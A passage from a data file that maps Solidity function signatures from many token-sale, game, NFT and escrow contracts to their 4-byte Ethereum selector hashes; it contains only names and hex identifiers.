"0x579425b7", "miningStorage()": "0x80dee9d1", "edgeRange()": "0xed81a68e", "advisorset()": "0xe966668c", "sellable()": "0x6deefc7a", "accForTeam()": "0xce7fc203", "percentTokensToSale()": "0xb0a2365c", "lastCWCETH()": "0x891363a6", "Police_2()": "0xca5b428f", "gameOwner()": "0xf6b12f28", "advisersTotal()": "0x5b53d291", "IQT_FUNDATION_ADDRESS()": "0xc4baf4a4", "icoBonus2()": "0x4aaceed3", "hasDividends()": "0x1dc9bb48", "Multiplier()": "0xfd9b8763", "preIcoSupply()": "0x8b3e23d9", "dev1Wallet2Pct()": "0x0fac20e1", "PoS()": "0x4f6dcf74", "preSaleFourthPrice()": "0xae5103e8", "VESTED_TEAM_ADVISORS_SHARE()": "0x4417bc66", "blockUntil()": "0x66be24ba", "ATTR_PRODUCIBLE()": "0x8645a3da", "isAllowClaimBeforeFinalization()": "0x877f5618", "tokensLocked()": "0xa1feba42", "minimumContributionPhase4()": "0xdc015851", "tokensBurnt()": "0xc6ead8af", "buyGasLimit()": "0x5147af92", "transferableBlock()": "0x5531680c", "getBlocksTillMattew()": "0xde154352", "advisersCliff()": "0x205e0e26", "cos(uint16)": "0x564a6b94", "sin(uint16)": "0xf985779c", "sin_table_lookup(uint256)": "0xaed82a99", "bits(uint256,uint256,uint256)": "0x276e3968", "TGCToken(address)": "0x6ba6e2e0", "burnPurchase(uint256)": "0xc6b6bc3c", "airdropTokens()": "0x91152c5c", "purch(address,uint256)": "0x0ba8d735", "finishedPurchase()": "0xc84ba84a", "setSwap(address,uint256)": "0x7ec72d3c", "ASEBToken()": "0xb837c94f", "Order()": "0xcc7e2208", "ProdTokensale()": "0xe4995a1d", "isMainSaleTime()": "0x14012549", "isMainSaleBonusTime()": "0x56bdb5c4", "isPreSaleTime()": "0xebab43e4", "canAcceptPayment(uint256)": "0x69d196e1", "Instacocoa(uint256,string,string,address)": "0x1935f8d2", "Daschain(uint256,string,string)": "0x9696fbf5", "refundTransactionInternal(uint256)": "0x039c9a21", "refundInvestor(address)": "0xff53c5a3", "refundManyTransaction(uint256[])": "0xb2f1fe99", "forwardInvestorTransaction(address,bytes)": "0x69f40ebc", "forwardManyTransaction(uint256[])": "0x93709788", "forwardTransaction(uint256,bytes)": "0xbfce477f", "deposit(address,bytes)": "0xcf2c52cb", "EthealDeposit(address,address)": "0x278bb4a2", "AGAVETHER(string,string)": "0x9d3fe4c2", "BanliangCoin()": "0xa8b415d2", "NCASHTOKEN()": "0x1a5b189d", "updateUSDXGE(uint256)": "0x729ee75b", "updateUSDETH(uint256)": "0x7f38a4a7", "BNSToken()": "0x2402598c", "markCredit(address,uint256)": "0xec912d61", "topdownAndCashout(address,uint256)": "0xdc566787", "buyAndTopup(address)": "0x87a9c6c5", "_markWithdraw(address,uint256)": "0x65eec589", "_markCredit(address,uint256)": "0x5313d890", "playerInfo(address)": "0x4b114691", "CryptoSpin(address)": "0xf6ea1a3f", "setRspTokenAddress(address)": "0x1b3aaf06", "_setRspTokenAddress(address)": "0xdc06e754", "getFactor()": "0x5184cc43", "WagaToken()": "0x2323a00e", "allBalances(address,address,address[])": "0xcac7fc71", "walletBalances(address,address[])": "0x77a7d968", "multiDeltaBalances(address[],address,address[])": "0x64422f3c", "deltaBalances(address,address,address[])": "0x6fb7fc8b", "DeltaBalances()": "0xec11d0cf", "Lemmon()": "0x1c77a4ec", "SPCToken()": "0x9367f8de", "airdropHasExpired(address,uint256)": "0x5e7d6fd0", "airdropsCount()": "0xd0bb1d40", "getTokensAvailableToMe(address)": "0xc3a83aab", "quitFromAirdrops()": "0xd96c0991", "signUpForAirdrops()": "0xd5b40406", "returnTokensToAirdropper(address)": "0x212c3fce", "airdropTokens(address,uint256,uint256)": "0x552fee9d", "signupUsersManually(address)": "0xc6705a00", "revokeSubmission(address,address)": "0xce3174ca", "approveSubmission(address,address)": "0xe57e31fa", "removeFromBlacklist(address,address)": "0x9d8374b4", "AirdropCentral()": "0x68c14a61", "decreaseApprovalPreSigned(address,uint256,uint256,uint256,uint8,bytes)": "0xb84aac5c", "increaseApprovalPreSigned(address,uint256,uint256,uint256,uint8,bytes)": "0xaa7618d5", "approvePreSigned(address,uint256,uint256,uint256,uint8,bytes)": "0xc0459899", "transferPreSigned(address,uint256,uint256,uint256,uint8,bytes)": "0x3efcd2e0", "decreaseApprovalPreSignedCheck(address,address,uint256,uint256,uint256,uint8,bytes)": "0x4715b308", "increaseApprovalPreSignedCheck(address,address,uint256,uint256,uint256,uint8,bytes)": "0xb97b451e", "approvePreSignedCheck(address,address,uint256,uint256,uint256,uint8,bytes)": "0xaaae05b2", "transferPreSignedCheck(address,address,uint256,uint256,uint256,uint8,bytes)": "0x8f4646b7", "preSignedCheck(bytes8,address,address,uint256,uint256,uint256,uint8,bytes)": "0x173fc012", "preSignedHashing(bytes8,address,address,uint256,uint256,uint256,uint8)": "0x6f086122", "messagePreSignedHashing(bytes8,address,address,uint256,uint256,uint256,uint8)": "0xf4064471", "upgradePrefixPreSignedSecond(uint8,bytes)": "0x16b0c11e", "upgradePrefixPreSignedFirst(uint8,bytes)": "0xf7164029", "setTotalPersistLimit(uint256)": "0xc0bb6c27", "removeMetadataObject(string)": "0x55368442", "addMetadataObject(string)": "0xaf477528", "addContract(address,uint256)": "0xb5522e89", "removeHash(string)": "0xfa59d199", "addHash(string,uint256)": "0xc96f5041", "IPFSProxy(address[],uint256,uint256)": "0xde758458", "reorganizeMembers()": "0x4bc36600", "changeMember(address,address)": "0xc353a89e", "Multimember(address[],uint256)": "0xc7381593", "_spawnAxie(uint256,address)": "0xbd68eb34", "evolveAxie(uint256,uint256)": "0xae67b4c3", "retireAxie(uint256,bool)": "0xc9644b77", "rebirthAxie(uint256,uint256)": "0x0d2cc54a", "spawnAxie(uint256,address)": "0x5dcc6dbc", "getAxie(uint256)": "0xa6472906", "AxieCore()": "0x72d5637f", "setTokenURIAffixes(string,string)": "0xfaf42125", "AxieERC721Metadata()": "0xe66f51fd", "_transferFrom(address,address,uint256,bytes,bool)": "0x604497a2", "_isContract(address,address)": "0x2d354cf8", "_removeTokenFrom(address,uint256)": "0x9260587e", "_addTokenTo(address,uint256)": "0xff5ce378", "_isApproved(address,uint256)": "0x39e851a3", "ROLE_LOCKUP()": "0x1728fb46", "tokenDistributionEndTime()": "0xd270b8e8", "firstDepositDate()": "0x4a1993e4", "salesCounter()": "0x7f37b905", "selectWinner30()": "0xaadf1e73", "EMISSION_FOR_SALESTAGE3()": "0xef8f1229", "intialSupply()": "0xd8627542", "finalize4()": "0xd2038d4d", "SMTfund()": "0xe58a6509", "ITO_TOKENS()": "0x80e5e069", "MaxStarIndexAvailable()": "0xc459b9e3", "setENDPhase()": "0x7d80def3", "publishier()": "0xd53dbe8e", "entryFee()": "0x072ea61c", "last_hash()": "0xa202e476", "priceStep7()": "0xc709c7b8", "addToReserve()": "0xb81f39a8", "privatesale_beneficiary()": "0x2dc8d88d", "getDailyTimeLeft()": "0x9ae06672", "getPreferedQtySold()": "0x94c41bdb", "thirdDiscountCap()": "0xb019ffd2", "XandraSupply()": "0x56ad41c8", "getAllTransactionIds()": "0x4c2d0378", "stepEtherValue()": "0xe7eb285f", "cofoundersSupplyVestingStartDate()": "0x36f93a99", "presaleClosed()": "0xabd2cc5f", "registrationBounty()": "0x4711dbe1", "tokensForTrivial()": "0x448b1f29", "ICOtokensSold()": "0xd2ff8fd8", "rateToEther()": "0x490bf04f", "founder2Address()": "0x9028353a", "preICOStats()": "0xfa7ca492", "presaleSales()": "0xe2e5fade", "FOUNDATION_POOL_ADDR()": "0x4451967c", "founderAddr()": "0xc9b5e555", "TOKEN_SUPPLY_CROWD()": "0x4d7569ac", "REFERRAL_BONUS_LEVEL1()": "0x1854229a", "startPreICOTimestamp()": "0x0b01856d", "numInvestors()": "0x132ae5e9", "bountyVaultAddr()": "0x9125ecf1", "isPreallocated()": "0xa39495f0", "useMonthlyAccess()": "0xe8e7c73d", "roundOneAmount()": "0xb5f918ff", "DSTMultisig()": "0xdaa50ee0", "nextTokenOwner()": "0x5b833f1e", "participationFee()": "0x9bb5ce30", "Chain4()": "0x8842bfa0", "inActive()": "0xf97a02fa", "accUserReward()": "0xffbfd19e", "Start_Resume_PreICO()": "0xd443f64a", "fundingLock()": "0xe56860c3", "removeTransferLock()": "0xf5308c7d", "endEarlyStage2()": "0x7b80a0ca", "PAPER()": "0xc44d6f87", "INTREPID_VOUCHER_PRICE()": "0x7d426826", "membersCount()": "0x297f9af0", "TEAM_POOL_TOKENS()": "0x07ccad95", "turn()": "0x8b299903", "maxFundingGoal()": "0x5001780b", "recallPercent()": "0x5950d395", "advisorSupply()": "0x798bede1", "finalizedBlock()": "0x4084c3ab", "teamWithdrawalProposed()": "0x40cc35ce", "privateStart()": "0x3631ecd9", "addressERC20Token()": "0x9156fb60", "icoOverride()": "0xe224179e", "torchRunner()": "0x94e0e328", "bountyTokensCount()": "0x106f6f33", "isBreedingMarket()": "0x310e5ce7", "dropEnabled()": "0x3f1a3d9e", "icoThreshold1()": "0x0e6c04db", "PRE_ICO_PERIOD()": "0xbd556252", "Locked()": "0x0f2e5b6c", "secondRoundTime()": "0xca9ccd3d", "decomission()": "0xd52a5fc4", "crowdsaleFundsWallet()": "0x45f23f10", "usedTotalSupply()": "0xaa09bab8", "PRE_SALE_SOFT_CAP()": "0xe5173942", "addressFundBounty()": "0x00c1e956", "FIXEDREWARD_MM()": "0xc4664649", "itemLottery()": "0x486083fe", "timeBetweenRewards()": "0xc6132eb3", "allowTransferTime()": "0x596ea3db", "saleMinimum()": "0x18898452", "percentToTakeAsRake()": "0xc31bb8d6", "icoAddr()": "0xfb64e6b1", "holdPeriod()": "0xf5967a2f", "targetAddress()": "0x5210eb56", "tokensReleasedToIco()": "0x1001c39c", "w_futureDevelopment()": "0xb75baa18", "getPriceContract()": "0x962dae57", "randContract()": "0x2ad3ef70", "reservingPercentage()": "0x43e92866", "TransCompleteds()": "0x8d2f349f", "numberOfStarsReserved()": "0x27120de9", "denominator()": "0x96ce0795", "priceStar5Now()": "0x4ea7d483", "sharingPool()": "0xc58f520f", "crowdsaleDeadline()": "0x2c4bca2c", "releaseValue4()": "0x0782fc35", "rejectPayments()": "0x5a2056ba", "acceptPayments()": "0x3ddd5313", "PrivateSale(address)": "0xa06e09f1", "editContributors(address[],uint256[],uint256[])": "0xad7b6884", "MANHATTANPROXY5THAVE()": "0x1a6ea411", "getMessageMaxCharacters()": "0x3f419c40", "setMessageMaxCharacters(uint256)": "0xcb84e69e", "getTop11_20Messages()": "0x83f66212", "getTop10Messages()": "0xcd3e45c5", "setMaxMessagesTop(int32)": "0x403575f7", "setMaxMessagesGlobal(int32)": "0xaf7a6164", "insertMessage(string,bool)": "0xe9b48288", "lengthMessages()": "0xfbd15163", "placeMessage(string,bool)": "0x34306cb8", "greaterPriceMsgComparator(uint256,uint256)": "0x48b741de", "smallerPriceComparator(uint256,uint256)": "0xc5ccebd3", "downTheDrain()": "0x94953294", "downTheDrainImmediate()": "0x580709cb", "calculateFactorFlushDifficulty(uint256)": "0x9c865645", "setMaxMarketOffers(int32)": "0xb357b72f", "getMarketComissionRatio()": "0x52fedceb", "setMarketComissionRatio(uint256)": "0x5f4964e0", "getDirectOffersComissionRatio()": "0x89d8f96f", "setDirectOffersComissionRatio(uint256)": "0x909006fc", "setSellRatio(uint256)": "0x66f2d859", "getSellRatio()": "0xf8c5e217", "setBuyRatio(uint256)": "0x7a706ac7", "getBuyRatio()": "0xc4b293db", "setMaxAddresses(int32)": "0xf430511a", "getMaxAddresses()": "0x3725814a", "letItRain(uint8,uint256)": "0x56cac2e0", "lengthAddresses()": "0x362e4945", "sendTaster(address)": "0x7114c13a", "sendShipmentTo(address,uint256)": "0xdcceaaa8", "sendSpecialTasterPackage(address,uint256)": "0x0421a94c", "returnAllCoke()": "0x030e9080", "returnCoke(uint256)": "0xc32a4c7e", "retrieveGains()": "0x75b03941", "retrieveChange()": "0xbe361f60", "checkGainsToReceive()": "0x89483926", "checkChangeToReceive()": "0x182b0b00", "buyCoke()": "0x03ae4c1f", "calculateEthValueFromTokens(uint256,uint256)": "0x31abdd2a", "calculateTokensFromWei(uint256,uint256)": "0xdbf1fe48", "transferInt(address,address,uint256,bool)": "0x33b8b1c1", "Coke()": "0xfd743f2b", "getMySellOrdersBlackMarketComplete()": "0x1e5296ef", "getSellOrdersBlackMarketComplete()": "0xacf400b2", "getSellOrdersBlackMarket()": "0xf619304a", "buyFromBlackMarket(uint256,uint256)": "0x5016b9b1", "cancelSellToBlackMarket(uint256,uint256,bool)": "0xb049d176", "sellToBlackMarket(uint256,uint256)": "0xb3e3cc34", "checkSellerOffer(address)": "0x173817b6", "checkMySellerOffer(address)": "0x1f9fed62", "cancelSellToConsumer(address)": "0xde82b54d", "buyFromTrusterDealer(address,uint256,uint256)": "0xcd852330", "sellToConsumer(address,uint256,uint256)": "0xfce4f84f", "setSucessor(address)": "0x39f4da78", "deactivateEmergencyProtectedMode()": "0x107f587c", "activateEmergencyProtectedMode()": "0x6046c37f", "recoverLostEth(address,uint256)": "0x0b642d72", "BiToro()": "0xf76cf4bf", "countUp(address)": "0x9dfffa36", "_keepLastTransaction()": "0x379c8f6c", "_renew()": "0xa1a59f52", "_payFee(uint128,address)": "0x51e16546", "sevenWinnerWithdraw()": "0x1fad4e79", "Countout()": "0xdfea8483", "Bloxxor(address,address,address,uint256,uint256,uint256)": "0x67b172c9", "drainRemainingTokens()": "0x92cc2c94", "RealEstateCryptoFundBounty(address)": "0x6b11c87a", "setBountyAmount(uint256)": "0x3828becc", "Bounty(address)": "0xcb95a6f6", "traitIdxToName(uint256)": "0xf4eda76a", "setKpopItemContractAddress(address,address)": "0x53f6740d", "doesUserOwnItem(address,uint256)": "0x62eba54c", "doesUserOwnCeleb(address,uint256)": "0x1adc36b9", "selectRandomTrait()": "0x84100d5c", "computeTraitScore(uint256,uint256,uint256)": "0xcbebc563", "computeWinner(address,uint256,uint256,address,uint256,uint256,uint256)": "0xda02b6cf", "challenge(address,uint256,uint256)": "0xc14a9f05", "rescind(address)": "0x4e2bd9ce", "enroll(uint256,uint256)": "0xa599ef65", "KpopArena()": "0x01d8ce92", "Saturn()": "0x4513a44e", "StarToken()": "0xd7d96a12", "buyBlock(uint256,uint256)": "0xd3481bd0", "setRowQuiter(bool)": "0x7e33e361", "st4ckHeight(uint256)": "0x9d3aee8d", "st4ckCount()": "0x275e2d3f", "Genius()": "0x1fc97e34", "HubiiCrowdsale(address,uint256,uint256)": "0xf3781697", "createERC20Token(uint256,string,uint8,string)": "0x34b20591", "ERC20TokenFactory()": "0x0c099133", "BAHACAN(uint256,string,string)": "0x08d90dc1", "CAOsale(uint256,uint256,string,string)": "0x4ef85140", "token(address,string,string)": "0xc84b0555", "getLevelConfig(uint32,uint32)": "0x9ea064b2", "setSellable(uint32,bool)": "0x6d12fb5b", "setCalFactor(uint32,uint32)": "0xb2549717", "getSpawningForCount(address)": "0x6436b1b9", "setSpawnProxy(uint32,address)": "0x2a19642c", "getSpawnProxy(uint32)": "0xf4e3be2d", "isSpawnProxy(uint32,address)": "0x24ba1a46", "doEscape(uint32)": "0x13063180", "cancelEscape(uint32)": "0xc6d761d4", "setEscapeRequest(uint32,uint32)": "0xa6345859", "isRequestingEscapeTo(uint32,uint32)": "0xfde90733", "getEscapeRequest(uint32)": "0xf5af6621", "isEscaping(uint32)": "0x9b350e12", "loseSponsor(uint32)": "0xbc562b9e", "isSponsor(uint32,uint32)": "0x08083039", "hasSponsor(uint32)": "0x77eb4c50", "getSponsor(uint32)": "0x439f7d3c", "getSpawned(uint32)": "0x846f652b", "getSpawnCount(uint32)": "0x293a9169", "incrementContinuityNumber(uint32)": "0xf4914919", "getContinuityNumber(uint32)": "0x108d995b", "setKeys(uint32,bytes32,bytes32,uint32)": "0xf9b87d40", "hasBeenBooted(uint32)": "0xe0d77ff6", "getKeyRevisionNumber(uint32)": "0x8d2d3f41", "getKeys(uint32)": "0xc210c623", "activateShip(uint32)": "0xa0b4388a", "isActive(uint32)": "0x5e19b305", "setOwner(uint32,address)": "0xddc35950", "getOwner(uint32)": "0x621b23e2", "isOwner(uint32,address,address)": "0x1920ed48", "getOwnedShipAtIndex(address,uint256)": "0x1725d8aa", "getOwnedShipCount(address)": "0x37848b6b", "getOwnedShipsByAddress(address)": "0x0a7354d9", "getOwnedShips()": "0xb4e05b89", "setDnsDomains(string,string,string)": "0xbac55edd", "updateBTCPrice()": "0x35b4a6d9", "updateEtherPrice()": "0x867b3d4b", "updateGoldPrice()": "0x26815de3", "buyTokensByBTC(address,uint256)": "0x3bf99b3f", "buyTokensByUSD(address,uint256)": "0xd962a68b", "getTokensByUSD(uint256)": "0x8aae13cb", "getTokensByBTC(uint256)": "0x35f68424", "getTokensByETH(uint256)": "0x948d902d", "CurrenseeCrowdsale(uint256,address,address)": "0x345efa4e", "withdrawBid(uint256)": "0x0eaaf4c8", "getBidData(uint256)": "0xa92c300a", "getSaleData(uint256)": "0x86630b7b", "acceptBid(uint256,uint256)": "0x02e9d5e4", "enterBidForGanToken(uint256)": "0x79c5ba97", "buyGanToken(uint256)": "0xb7682a81", "offerGanTokenForSaleToAddress(uint256,address,uint256)": "0xaf8ec44c", "offerGanTokenForSale(uint256,uint256)": "0x6026c151", "ganTokenNoLongerForSale(uint256)": "0xb1766617", "newGanToken(uint256)": "0xac6ee852", "getAllTokenIds()": "0xbdbed722", "updatePhaseSupplyAndBalance(uint256)": "0xf843ea4d", "setClaimPrice(uint256)": "0x51f468c0", "LendConnect(address)": "0x9e80138c", "GanNFT()": "0x6620cc3c", "getFoundersTokens()": "0x2936c27a", "isLeftTokens(uint256)": "0xa2c77e68", "AFRIHUBcredits()": "0x0d55af64", "Th0m4z()": "0x4a366c46", "TEST()": "0x51d977a6", "destructo()": "0xb14edac5", "drainexcess()": "0x48d0aff3", "initiatecontract()": "0x177b979e", "estimatesellvalue(uint256)": "0x04cf447d", "getCET6ByAddr(address)": "0x0c549dd9", "donatetokens(uint256)": "0x016774e9", "getCET4ByAddr(address)": "0xf2b3ddfa", "givepoints(address,uint256)": "0xad0e8bc7", "addCET6To(address,uint32,uint32)": "0xebae743b", "transferpoints(address,uint256)": "0x3a015ef9", "addCET4To(address,uint32,uint32)": "0xf80fb7ae", "settxpct(uint256)": "0xc3077c10", "addDoctorTo(address,string,string,string,uint8,uint8,uint8,uint8,uint8,uint8,uint32,uint32)": "0x6702416e", "addMasterTo(address,string,string,string,uint8,uint8,uint8,uint8,uint8,uint8,uint32,uint32)": "0x261eafc8", "MyGlobeToken(uint256,string,string)": "0x43ded8e3", "addUndergraduateTo(address,string,string,string,uint8,uint8,uint8,uint8,uint8,uint8,uint32,uint32)": "0xe4538c6c", "createStudent(string,string,string,uint32,bytes1)": "0xe22ed995", "_isIdExisted(string)": "0xa3a6c73e", "setValues(uint256,uint256,uint256,uint256)": "0x862b6683", "isServiceContract(address)": "0x22039f89", "ServiceContractResolver(address)": "0xaec02eb5", "MBT()": "0xb90436ba", "getPercentage(uint256)": "0xe161c3bf", "cancelReservation(uint256)": "0xae5e6cf4", "calculateTokenGet(uint256,uint256,uint256,bool,bytes32)": "0xff5732a5", "finalizeRent(uint256,uint256)": "0x994977e5", "calculateBaseGet(uint256,uint256,bool,uint256)": "0xbaf03586", "book(uint256[],uint256)": "0x796686a9", "calculateFee(uint256,uint256,uint256,bytes32,bool,bool)": "0x0d41117f", "removeAvailability(uint256[],uint256)": "0x07b26217", "updateUserBalance(uint256,bool,uint256,uint256,uint256,address,address)": "0xa1e4eaf1", "isFree(uint256[],uint256)": "0x8e84d413", "internalTrade(uint256,uint256,uint256,uint256,uint256,uint256,bool,address,address,bytes32)": "0xd2a6cf5e", "setMaxAvailableSpot(uint256)": "0xc88b675b", "processTakerOrder(uint256,uint256,uint256,uint256,bool,address,address,bytes32)": "0x0c6fc9b2", "setTimes(uint256[],uint256[])": "0xe3e28bab", "verify(bytes32,address,uint8,bytes32,bytes32)": "0x92d4d9ac", "setServiceDuration(uint256)": "0x04213a59", "getTokenOrderDataHash(uint256[],uint256,uint256,address,address)": "0xbcfb0140", "_computePrice(uint256)": "0x2b35d08a", "_useName(address,bytes32)": "0x687bf382", "_approve(address,address,bytes32)": "0x89a9d38e", "_transfer(address,address,bytes32)": "0xb121a199", "_register(bytes32,address)": "0x0c7d8c20", "rawDetailsOf(bytes32,bytes32)": "0x9b10e9f7", "rawOwnerOf(bytes32)": "0x7817eedd", "rawNameOf(address,address)": "0x1f7a41f1", "rawSendEther(bytes32)": "0x7d1157c8", "rawWipeAttributes(bytes32,bytes32[])": "0x7aa1a77d", "rawSetAttribute(bytes32,bytes32,bytes)": "0xeca0290b", "rawUseName(bytes32)": "0x5d8d4415", "rawBuy(bytes32)": "0x4fca3159", "rawSetPrice(bytes32,uint256)": "0xfd8828eb", "rawTransferFrom(address,address,bytes32)": "0xb0d60c2e", "rawApprove(address,bytes32)": "0xf4a92020", "rawTransfer(address,bytes32)": "0xdd955d4c", "rawRegister(bytes32)": "0x783b4569", "callFor(address,uint256,uint256,bytes)": "0xc60c3aca", "transferPower(address)": "0xf818d723", "claimETH()": "0x67272999", "sendTokensManually(address,uint256)": "0xd1729a4a", "whitelistAddress(address,bool)": "0xb9a45aac", "assingAdminship(address,uint8)": "0x57652f13", "withdrawVNET(address,uint256)": "0x000c65c3", "deletePaymentContract(uint8)": "0x224846de", "setPaymentContract(uint8,address)": "0xe4246ba0", "setRegistryContract(address)": "0x028ebc44", "TokitDeployer(address,address)": "0xacbc62ae", "SingularDTVLaunch(address,address,address,uint256,uint256,uint256,uint256,uint256)": "0x7873832e", "changeValuePerToken(uint256)": "0x7da63c59", "withdrawUnsentTokensForOwner()": "0xad1aa252", "withdrawContribution()": "0x0d616d20", "withdrawReward()": "0xc885bc58", "calcReward(address)": "0x3a61738d", "depositReward()": "0x5ec2dc8d", "setRegistrar(address,bool)": "0xc1bf1dcf", "lookupByProject(uint256)": "0x2090d5e9", "lookup(address,uint256)": "0xb033a6c3", "register(address,uint256,address,address)": "0xcc027cc9", "TokitRegistry(address)": "0x768255ca", "getDeposit(uint256)": "0x9f9fb968", "HCOIN()": "0x97346423", "Airstayz()": "0x2f9ffab9", "UTORN()": "0xf3036c24", "YCBIToken()": "0xc0fdba2d", "NeoCrowdsale(uint256,uint256)": "0x88705f7d", "Vlogchain(uint256,uint256)": "0x2a4ff14a", "Race()": "0xe8d88bd4", "BRFToken()": "0x3caebce4", "getEscrowAndHash(bytes16,address,address,uint256,uint16)": "0xd9784223", "getRelayedSender(bytes16,uint8,uint128,uint8,bytes32,bytes32)": "0xa8a52747", "doSellerRequestCancel(bytes16,address,address,uint256,uint16,uint128)": "0x93b30efc", "doSellerCancel(bytes16,address,address,uint256,uint16,uint128)": "0xb848b944", "doBuyerCancel(bytes16,address,address,uint256,uint16,uint128)": "0xbec13af1", "doDisableSellerCancel(bytes16,address,address,uint256,uint16,uint128)": "0x5bc6d41d", "doRelease(bytes16,address,address,uint256,uint16,uint128)": "0x41eeb105", "batchRelay(bytes16[],address[],address[],uint256[],uint16[],uint128[],uint8[],bytes32[],bytes32[],uint8[])": "0x8eb4e0ad", "resolveDispute(bytes16,address,address,uint256,uint16,uint8,bytes32,bytes32,uint8)": "0x24943c7d", "createEscrow(bytes16,address,address,uint256,uint16,uint32,uint32,uint8,bytes32,bytes32)": "0xf1e03d67", "unfreezeBonuses()": "0x752dd0dc", "setFreezingPercentage(uint8)": "0xd6481502", "bonusesOf(address)": "0x79a410a7", "transferWithBonuses(address,uint256,uint256)": "0x194fe9a4", "distributeCHENDE(address[])": "0x7848033e", "CHENDE()": "0xf120974e", "changeAuthorisedContract(address)": "0x14f99533", "getUnclaimedEtherIfAny(uint256)": "0x35c699c4", "getAdminFee()": "0x2a905ccc", "claimProfit(uint256)": "0xd22dee48", "purchaseTicket(uint256)": "0xb948348c", "getNumTicketsPurchased(uint256,address,address)": "0xcc6305ed", "getNumGames()": "0x6ce079fe", "setCurrentActiveGameID(uint256)": "0x628c866e", "createGame(uint256,uint256,uint256,uint256,uint256,uint8)": "0xb39852f9", "Zandar()": "0x1c5992ff", "transferBack(uint256)": "0xeae7236f", "updateRoundBalance(uint256)": "0xa0847a95", "canBuyTokens(uint256)": "0x1b12b60f", "VVDBCrowdsale(address,address)": "0x57861e65", "VVDB(address)": "0x7762df18", "EndEvent(bool)": "0x1c43d8b1", "BurnToken(address[])": "0xfeaaa476", "AllocateToken(address[])": "0x8ab058b1", "charactersOf(address)": "0xa0a76eb0", "setCurrentPrice(uint256)": "0x18b20071", "setMaxCharId(uint32)": "0x3c7097a3", "priceIncrease()": "0xf8c34050", "_provideChars(address,address,uint32)": "0x1349f5ec", "ETCharPresale(address)": "0x8ea67eb0", "PresaleContract(address)": "0x8177ffae", "changeCATDestinationAddress(address)": "0x7b6e8740", "unlockSecond()": "0xa3b34190", "unlockFirst()": "0x17dbaf9b", "CATFreezer(address,address)": "0xa7483f74", "whitelistAddress(address,address)": "0x5f75b5ef", "CrowdsaleRC()": "0xd25b4f2a", "isRateValid(uint256)": "0x140420a9", "waitingOracles()": "0x4f96e039", "readyOracles()": "0x3a16c51e", "ekkoBlock(uint256,string,uint8,string)": "0x7adb7ced", "removeDestroyer(address)": "0xb7c8561f", "addDestroyer(address)": "0xb0c13bfb", "EtheraffleFreeLOT(address,uint256)": "0x0c987501", "CioCoinERC21Token(uint256,string,string,uint256)": "0xe9d979dd", "spawn()": "0xb547aeda", "checkAndGetSendersID()": "0x9cede14c", "claimQueen(uint8)": "0x612845fc", "BDP()": "0xaa78a883", "CannabizToken()": "0xf6be4776", "isSet(address)": "0x74ebe3ec", "allocateFrom(address,address,uint256)": "0x88016da5", "numOfInflatableTokens()": "0x03771f2f", "numOfUntransferableEcTokens(address)": "0xe531a9b8", "numOfTransferableCompanysTokens()": "0x4a418fb7", "isTransferable(address,uint256)": "0x88fc65fb", "updateFundraiser(address,bool)": "0xdf50a8c1", "addFundraiser(address)": "0xef688df5", "declareMvpLaunched(uint256)": "0x37918bcb", "allocateToEarlyContributor(address,uint256)": "0x3923afee", "declarePublicOfferingPlan(uint256,uint256)": "0xe1ab5860", "numOfDeclaredPublicOfferingPlans()": "0x168b912d", "StarbaseToken(address,address,address)": "0x5ddaf07f", "MEGAMALLCOIN()": "0xe9a62ba6", "RxPharma()": "0xc54c80eb", "Tutoreum()": "0xb106ef69", "missingTokensFallback()": "0x13224fc5", "frozenStatusOf(address)": "0xc0e22f31", "setSomeValue(uint256)": "0xe53831ed", "getPlayersFibokens()": "0x403446bd", "getPlayersBalances()": "0xd7af26f8", "getFibonziPlayers()": "0x99c87629", "getPoolOwners()": "0xfc034bd8", "getPoolPrices()": "0x4806b2d2", "getPoolIds()": "0xb4f2bb6d", "getFibonacci(uint256)": "0x90cbcf92", "getUsablePlayerFibokens(address)": "0x278cc714", "usePlayerFiboken()": "0xb59b44f5", "rewardFiboken()": "0x094c491b", "splitComissions(uint256)": "0xa53c6dd4", "createPoolsIfNeeded()": "0x64422ede", "isPlayer()": "0x76740de0", "withdrawComission()": "0x4c62a644", "Uncloak()": "0xa95d9c14", "JYToken()": "0x052d5707", "SecretCoin()": "0xd75318f8", "_addLock(uint256,uint96,address,uint256)": "0xa56539a4", "start_POSTICO()": "0xd0169f4c", "CTOcoin()": "0xf8e1ec40", "_utfStringLength(string)": "0x34a503e8", "supportRecord(uint256)": "0xe4ba3969", "createRecord(string,string)": "0xc090b4df", "updateRecordName(uint256,string)": "0x6eca6a9e", "emergencyOverwrite(bytes32,uint8,uint8)": "0x355ba211", "changeBid(bytes32,uint8,uint8)": "0x4636db04", "changeRules(bool,bool,bool,bool,bool)": "0x12bddc9c", "getBadAddresses()": "0x5225528e", "Bitscreen(bytes32,uint8,uint8,uint8,uint8,string)": "0x62040e50", "PaquariumTokenTest2(uint256,string,uint8,string)": "0x262799f7", "SHIPToken(address,address)": "0x2cbbbd2d", "MMX(uint256,string,string)": "0xf376daa8", "withdrawalToken(uint256)": "0xdeddab12", "withdrawalEth(uint256)": "0x1edc8f03", "burnThis(uint256)": "0xbb6c4827", "IsTradeable()": "0x8aa99826", "SetTradeable(bool)": "0x8e3bd6fa", "UnlockAccount(address)": "0xb9c97a44", "LockAccount(address)": "0x2e42b012", "DestroyToken(uint256)": "0x5daf8a71", "lastDayPaid()": "0xef431437", "DailyMint()": "0xd9da76de", "EMPR()": "0x3efcad6d", "FoundationTransfer(address,uint256,uint256)": "0x0730a322", "TransferOwner(address)": "0x858ac4d8", "IsOwner(address)": "0xdd0860a8", "timeToUnlockDDHHMM()": "0xb31dcaad", "all_team_accounts()": "0xfc65b3ac", "GJMI()": "0xf112ddc0", "FCC(address)": "0xe4929aa4", "KLSToken(uint256,string,uint8,string)": "0x8bdac196", "B2BCoinContract()": "0xc0f3ab76", "getBlock()": "0x2e97766d", "isContributor(address)": "0x1d0d35f5", "addContributor(address)": "0xb579184f", "EtchReward(uint256)": "0x1fa08ad8", "AllstocksToken()": "0xcc34f810", "Nero()": "0x85255ab0", "Whales_group()": "0x13ba350a", "MyDice75()": "0x16706514", "ZigguratToken(uint256,string,uint8,string)": "0xdeef6c99", "transferCoadminship(address)": "0x4d7d9a91", "uploadData(bytes32[])": "0x570a8496", "HOWL()": "0xdf8011b2", "YRQ(uint256,string,string)": "0xbc99d04c", "Cider()": "0x3598ac34", "CueCrypto()": "0xd433ea6a", "Csts()": "0xe1089240", "PlayStationChain()": "0xdb946a11", "INFLIV()": "0x47e4e65e", "NerdShitCoin()": "0xf09c3152", "bringuPort(address)": "0x5b500996", "claimIFactor2(bytes32,bytes32)": 